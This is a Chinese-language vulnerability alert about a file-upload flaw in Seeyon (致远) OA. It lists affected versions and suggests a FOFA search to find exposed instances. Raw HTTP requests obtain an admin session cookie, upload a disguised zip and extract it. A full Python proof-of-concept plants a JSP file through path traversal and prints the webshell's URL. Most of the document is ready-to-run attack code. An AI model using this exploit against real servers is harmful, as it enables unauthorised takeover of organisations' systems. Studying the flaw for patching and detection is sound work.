致远OA文件上传漏洞——可以上传webshell

致远OA文件上传漏洞预警
1.漏洞描述
致远OA是一套用于OA办公的自动化软件，该软件存在文件上传漏洞，攻击者能够上传恶意脚本文
件，从而控制服务器。
2.影响版本
致远OAV8.0，V7.1，V7.1SP1，V7.0，V7.0SP1，V7.0SP2，V7.0SP3，V6.0，V6.1SP1，
V6.1SP2，V5.x
3.漏洞复现
FOFA搜索"seeyon"：
首先是一个获取管理cookie的漏洞：

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQz
NDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

　　然后上传压缩包：

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"

true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"

resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"

0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"

false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"

0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.png"
Content-Type: image/png

111
--59229605f98b8cf290a7b8908b34616b--

　　然后解压：

POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913
Content-Length: 157

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayo
utAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D

　　完整poc：

#coding:utf-8
import time
import datetime
import zipfile
import random
import string
import requests

import re
import os

requests.packages.urllib3.disable_warnings()
proxy = None#{'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

def check_file():
    path = os.getcwd()
    file_path = os.path.join(path,"payload.zip")
    if os.path.exists(file_path):
        os.remove(file_path)

def write_zipfile(fname, content):
    with zipfile.ZipFile('payload.zip', mode='a', compression=zipfile.ZIP_DEFLATED, ) as zf:
        zf.writestr('layout.xml', "")
        zf.writestr(fname, content)

def rand_str(num):
    ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num))
    return ran_str

def get_cookie(targeturl):
    headers = {'User-Agent': ua,'Content-Type': 'application/x-www-formurlencoded'}
    url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl)
    post= "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8")
    response = requests.post(url=url,data=post,proxies=proxy,headers=headers,
    timeout=60,verify=False)
    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
        cookies = response.cookies
        cookies = requests.utils.dict_from_cookiejar(cookies)
        jsessionid = cookies['JSESSIONID']
        print("[+] get cookie:{jsessionid}".format(jsessionid=jsessionid))
        return jsessionid
    else:
        print('[-] get cookie error !')

def upload_zip(targeturl,cookie):
    url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl)
    files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octetstream'))]
    headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': ua}
    post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 'isEncrypt': "0"}
    response = requests.post(url=url,files=files,data=post,
    headers=headers,proxies=proxy,timeout=60,verify=False)
    if response and response.status_code == 200 and 'fileurls=' in response.text:
        fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I)
        if len(fileid) > 0:
            print("[+] get fileid:{fileid}".format(fileid=fileid))
            return fileid[0]
        else:
            print("[-] get fileid error !")

def extract_file(targeturl,cookie,fileid):
    url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl)
    headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': ua, 'Content-Type':'application/x-www-form-urlencoded'}
    datestr = time.strftime('%Y-%m-%d')
    post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D'
    response = requests.post(url, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
    if response.status_code == 500 and "Error" in response.text:
        print("[+] extract file is ok!")
        return True
    else:
        print("[-] extract file error !")

def main(targeturl):
    fname = f'../{rand_str(8)}.jsp'
    shell = r'<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>'
    check_file()
    write_zipfile(fname,shell)
    cookie = get_cookie(targeturl)
    fileid = upload_zip(targeturl, cookie)
    if extract_file(targeturl, cookie, fileid):
        url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1])
        print("webshell path: {url}".format(url=url))

if __name__ == '__main__':
    targeturl = "http://xxx"
    main(targeturl)